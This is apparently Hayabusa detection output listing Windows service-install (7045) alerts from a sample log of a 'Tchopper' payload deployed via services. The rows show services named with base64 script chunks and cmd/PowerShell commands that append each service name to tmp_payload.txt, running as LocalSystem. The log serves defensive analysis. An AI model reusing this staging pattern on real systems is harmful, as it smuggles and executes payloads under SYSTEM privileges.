2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
